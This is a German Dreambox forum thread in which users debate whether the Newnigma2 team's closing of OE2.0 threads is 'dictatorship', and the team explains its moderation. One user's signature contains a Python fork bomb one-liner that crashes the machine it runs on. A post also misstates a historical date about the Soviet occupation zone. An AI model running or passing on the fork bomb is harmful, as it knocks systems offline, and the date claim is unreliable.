Ist hier eine Diktatur oder wie sehe ich das

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Ist hier eine Diktatur oder wie sehe ich das

    dachte das Diktaturen und Zensur nur in China gibt , das ist hier ein Forum und sollte jeder fragen und sagen können was er will solange es nicht gegen Gesetz ist.

    Sehe in letzter Zeit ja nur noch Moderatoren die Beträge schliessen die OE2.0 betrifft finde das S....t

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von DenizGP ()

  • 1. Gibt es noch kein Newnigma OE2 Image, desswegen machen keine OE2 Fragen Sinn.

    2. Alles was das DMM OE2 Image betrifft kann im DMM-Forum gefragt werden...


    PS.: Nicht alles an einer Diktatur ist schlecht =)
    Probleme kann man niemals mit derselben Denkweise lösen.

    ¯\_(ツ)_/¯

    "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von deepblue2000 ()

  • Das "Quatschen" über OE2 ist nicht "verboten". In diesen Threads wird allerdings entweder nach OE2-NN² ETA gefragt oder nach Emus...naja das braucht man sich nicht wunder dass nun alles dicht gemacht wird!
    "Wer ins Wasser sieht, sieht den Himmel auf Erden"
  • hey


    ich denke ihr wisst garnicht was eine diktatur bedeutet habe 26 jahre in einer gelebt nie wieder.

    last das team arbeiten und es wird schon kommen nur geduld .vorallem nicht ausfallend werden denke ich ists der beste weg in einen bord.


    mfg tyson:D
    :freu: Der neid der anderen kotzt mich an :freu:
  • ich habe keine probleme mit beitraegen zu dem oe 2.0 nur da steht meistens drinne wie krieg ich eine cam zum laufen oder wann kommt nn2 mit oe 2.0. das geht mir persoenlich auf den zeiger. sorry jungs. wenn ihr das dmm image nutzen wollt mit einem emu, dann fragt bitte nicht hier oder hat das was mit unserem image zu tun?

    ehrliche meinung: die neuen oe image sind wohl nur fuer die dm8000/dm7020hd geignet zur zeit. meine 500hd hat einen erheblichen platzmangel mit dem neuen kram. selbst wenn ich radikal alles remove komm ich mit dem picon auf 88% freien speicher. problem ist dann auch wieder, das sich einige sachen, durch updates wieder mit einspielen.

    warum sollten wir euch sowas zumuten ? hbbtv ? echt super yavideo geht bei mir nicht mal. man kann hbbtv nur mit einem hd skin nutzen. ich persoenlich gebe meinen kerni no2 nicht her. also ein feature was fuer mich persoenlich unbrauchbar ist. des weiteren muessen saemtliche sachen, die ihr fuer selbstverstaendlich bei unserem images haltet, angepasst werden. wenn ich meine taegliche stundenzahl hier sehe, wird mir schlecht. freizeit ? das wort muss ich im duden nachschlagen.

    eigentlich soll das hier ein hobby sein und kein schlechtbezahlter job (0,00 €). bitte flasht euch den "muell", aber stellt nicht immerwieder die selben fragen!
  • Der Forumbetreiber hat hier Hausrecht und kann hier dulden oder ablehnen wie es ihm beliebt.

    Es ist anscheinend nicht im Interesse des Forumbetreibers hier über andere Images zu sprechen -bzw. über die Integration von "speziellen Funktionalitäten".

    Respekt ist hier das Zauberwort, nicht das beharren auf einer Demokratischen Idee, welche in einem Forum nunmal nicht die Realität ist.

    LG
    Aresta
    Ich benötige kein 3D, Doppel-D reicht vollkommen :tongue:

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Aresta ()

  • Hi,

    das ist teilweise schon richtig, wir haben hier keine Demokratie.
    Das Team betreibt dieses Forum, die Server und entwickelt das Image.

    Das Team entscheidet über zulässige und erwünschte Inhalte.

    Es ist anscheinend nicht im Interesse des Forumbetreibers hier über andere Images zu sprechen -bzw. über die Integration von "speziellen Funktionalitäten".


    Jaein, ihr dürft gerne auch über andere Images schreiben und natürlich auch über das DMM Image diskutieren - da hat niemand etwas dagegen.

    Wir haben aber etwas dagegen wenn hier 30 Threads zum selben Thema erstellt werden - wir sind schließlich auch bemüht das Forum übersichtlich zu halten.

    Wir werden euch auch keine Quick-Start-Anleitung zur Verfügung stellen wie man Images baut oder modifiziert.

    Wenn ihr spezielle Fragen zu den DMM Images habt dann fragt im DMM Forum nach - achja da sind ja Diskussionen über Softcams auch unerwünscht. :rolleyes:
  • @ ozxs + sparks + Team

    Ich finde, dass ihr das hier alles absolut Super macht und euch daher nicht stressen lassen solltet.
    Habt ihr meiner Meinung überhaupt nicht notwendig.

    Mein Vorschlag:

    Lasst es doch einfach laufen, ohne zu sperren, damit alle ein gutes Gefühl der Freiheit haben und beantwortet doch solche Fragen einfach nicht. So können die anderen Mitglieder trotzdem frei "spekulieren"......

    Wem es nicht passt, der kann ja ein eigenes Forum aufmachen, was mit eurer Leistung zu vergleichen, sehr schwer sein dürfte.......

    Von meiner Seite noch mal vielen Dank an euch. Weiter so.

    Gruß,
    NL
  • Bei Diktatur fällt mir ein ganz anderes Dreambox-Forum ein, wo du sogar wegen simpler Feature-Requests (Videotext Precaching) blöd angemosert wirst.

    Ne Leute, das NN-Team ist phantastisch und opfert immens viel Zeit für Forum und Image. Such mal ein Image, was Vergleichbares kann. Mir fällt keins ein. Und wenn sich die neuen OE 2.0-Features mit NN verwirklichen lassen, dann gibts bestimmt ein geniales Release. Hat also meiner Meinung nach wenig Sinn, hier ständig neue Threads aufzumachen oder zu kritiseren, dass irgendwas nicht so gehandhabt wird, wie man das individuell gerade haben möchte.
  • Original von nilslars
    @ ozxs + sparks + Team

    Ich finde, dass ihr das hier alles absolut Super macht und euch daher nicht stressen lassen solltet.
    Habt ihr meiner Meinung überhaupt nicht notwendig.

    Mein Vorschlag:

    Lasst es doch einfach laufen, ohne zu sperren, damit alle ein gutes Gefühl der Freiheit haben und beantwortet doch solche Fragen einfach nicht. So können die anderen Mitglieder trotzdem frei "spekulieren"......

    Wem es nicht passt, der kann ja ein eigenes Forum aufmachen, was mit eurer Leistung zu vergleichen, sehr schwer sein dürfte.......

    Von meiner Seite noch mal vielen Dank an euch. Weiter so.

    Gruß,
    NL


    genau auf den Punkt gebracht. Verwendet eure Energie nicht dazu, ständig überflüssige Beiträge zu kommentieren bzw. zu löschen. Einfach ignorieren und cool bleiben, desto mehr Zeit bleibt für die Entwicklung des neuen NN2 übrig ;) .

    Gruß
  • Tja hier herrscht mit sicherheit keine demokratie sondern das Team entscheidet ganz einfach.
    Ihr könnt über das image bei dmm diskutieren die freuen sich drüber :P :P :P
    Wenn es hier bei einem beitrag bliebe und net jede 2 frage wie baue ich xxx ein anfangen würde wäre es kein problem.
    Aber ihr lest nicht und regeln gehen euch nichts an ihr wollt nur euren teil beantwortet bekommen schade ist nur das viele user die fragen dazu haben mit abgewürgt werden weil euch das egal ist.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • RE: Ist hier eine Diktatur oder wie sehe ich das

    Original von DenizGP
    Ist hier eine Diktatur oder wie sehe ich das


    jup ist es ....

    - ... nicht vergessen, du bist hier im Newnigma2 forum und hier haben die leute das sagen die diesen server/forum betreiben, kannst gern deinen eigenen server im internet mieten und dort dann eine freie meinungsäußerung versuchen ;)

    - ... hier geht es ums NN2 image das die macher uns freundlicherweise zur verfügung stellen und dann noch ein forum/chat dazu anbieten, ich kenn E2 images da gibts 0 support ;)
  • Original von oZxS

    ehrliche meinung: die neuen oe image sind wohl nur fuer die dm8000/dm7020hd geignet zur zeit. meine 500hd hat einen erheblichen platzmangel mit dem neuen kram. selbst wenn ich radikal alles remove komm ich mit dem picon auf 88% freien speicher. problem ist dann auch wieder, das sich einige sachen, durch updates wieder mit einspielen.
    !


    naja ich sag mal so ich mit meiner 800se muss sich wohl auf jeden fall mit nem usb stick und auslagerung darauf beschäftigen. Die Picons liegen ja schon da.

    hbbtv brauch ich auch net aber cec interessiert mich schon.
    Würde auch mal mittesten :freu: wenn ich darf ;) und sollte ich nicht klarkommen, obs nun um emus oder sonstiges geht spiel ich halt wieder ein Backup meines jetzigen NN2 ein und gut is.
    BZW würde ich natürlich sonstige Dinge melden die mir so auffallen.

    Bin ja auch im Chat.

    PS: Bin übrigens ein Riesen Fan eures Images und würd ja auch noch warten, aber ich bin doch so ungeduldig :) Muss halt immer was zum basteln haben

    VG LaFo

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von onkel-geordi ()

  • RE: Ist hier eine Diktatur oder wie sehe ich das

    Am 3.Oktober 1989 war es aus mit der SBZ.
    Scheint mir das einige aus der Stasi überlebt haben.

    Community (engl. für Gemeinschaft in einem sehr weiten Sinne) bezeichnet.
    Eine Online-Community (Netzgemeinschaft) ist eine Sonderform der Gemeinschaft; hier von Menschen, die einander via Internet begegnen, um sich dort auszutauschen.#

    edit: de.wikipedia.org/wiki/Online-Community

    edit:Scheint mir das da nicht jeder im Unterricht aufgepasst hat.
    de.wikipedia.org/wiki/Sowjetische_Besatzungszone

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Lancom ()

  • RE: Ist hier eine Diktatur oder wie sehe ich das

    Original von Lancom
    Am 3.Oktober 1989 war es aus mit der SBZ.
    Scheint mir das einige aus der Stasi überlebt haben.

    Community (engl. für Gemeinschaft in einem sehr weiten Sinne) bezeichnet.
    Eine Online-Community (Netzgemeinschaft) ist eine Sonderform der Gemeinschaft; hier von Menschen, die einander via Internet begegnen, um sich dort auszutauschen.#

    edit: de.wikipedia.org/wiki/Online-Community


    Original von =sven=

    jup ist es ....

    - ... nicht vergessen, du bist hier im Newnigma2 forum und hier haben die leute das sagen die diesen server/forum betreiben, kannst gern deinen eigenen server im internet mieten und dort dann eine freie meinungsäußerung versuchen

    - ... hier geht es ums NN2 image das die macher uns freundlicherweise zur verfügung stellen und dann noch ein forum/chat dazu anbieten, ich kenn E2 images da gibts 0 support


    Mehr ist doch dazu nicht zu sagen.
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)